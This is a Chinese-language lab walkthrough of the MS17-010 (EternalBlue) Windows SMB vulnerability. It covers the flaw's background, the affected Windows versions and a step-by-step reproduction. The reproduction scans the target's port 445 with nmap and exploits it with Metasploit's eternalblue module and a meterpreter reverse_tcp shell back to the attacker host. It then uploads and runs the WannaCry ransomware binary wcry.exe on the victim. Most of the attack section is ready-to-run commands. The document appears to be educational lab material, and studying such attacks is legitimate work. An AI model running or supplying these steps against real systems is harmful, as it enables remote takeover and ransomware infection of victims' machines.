永恒之蓝 MS17-010
一、漏洞简介
1、永恒之蓝介绍:
永恒之蓝漏洞(MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成 。勒索病毒的肆虐,俨然是一场全球性互联网灾难,给广大电脑用户造成了巨大损失。据统计,全球100多个国家和地区超过10万台电脑遭到了勒索病毒攻击、感染。
2、漏洞原理:
永恒之蓝漏洞通过 TCP 的445和139端口,来利用 SMBv1 和 NBT 中的远程代码执行漏洞,通过恶意代码扫描并攻击开放445文件共享端口的 Windows 主机。只要用户主机开机联网,即可通过该漏洞控制用户的主机。不法分子就能在其电脑或服务器中植入勒索病毒、窃取用户隐私、远程控制木马等恶意程序。
3、影响版本:
目前已知受影响的 Windows 版本包括但不限于:WindowsNT,Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。
4、漏洞复现:
实验环境:
- 攻击机:Kali-Linux IP:192.168.47.129
- 靶机 Win 7 64位 IP:192.168.47.128
实验工具:
- metasploit
- MS17-010
- wcry.exe
实验步骤:
-
扫描靶机是否开启 445 端口
nmap -sS 192.168.47.128 -
打开漏洞利用工具 msfconsole
msfconsole -
查询 MS17-010 漏洞模块
search ms17-010 -
利用永恒之蓝漏洞
use exploit/windows/smb/ms17_010_eternalblue -
设置 payload
set payload windows/x64/meterpreter/reverse_tcp -
设置本机 IP
set LHOST 192.168.47.129 -
设置受害主机 IP
set RHOST 192.168.47.128 -
设置端口 445
set RPORT 445 -
漏洞利用
exploit -
解决 Windwos 命令行乱码
chcp 65001 -
查看当前路径
pwd -
查看当前目录下文件
ls -
进入 C 盘根目录
cd C:\ -
上传 勒索病毒至win 7 系统
upload /home/kali/wcry.exe c:\ -
进入 Win 7 终端
shell -
执行 wcry.exe
wcry.exe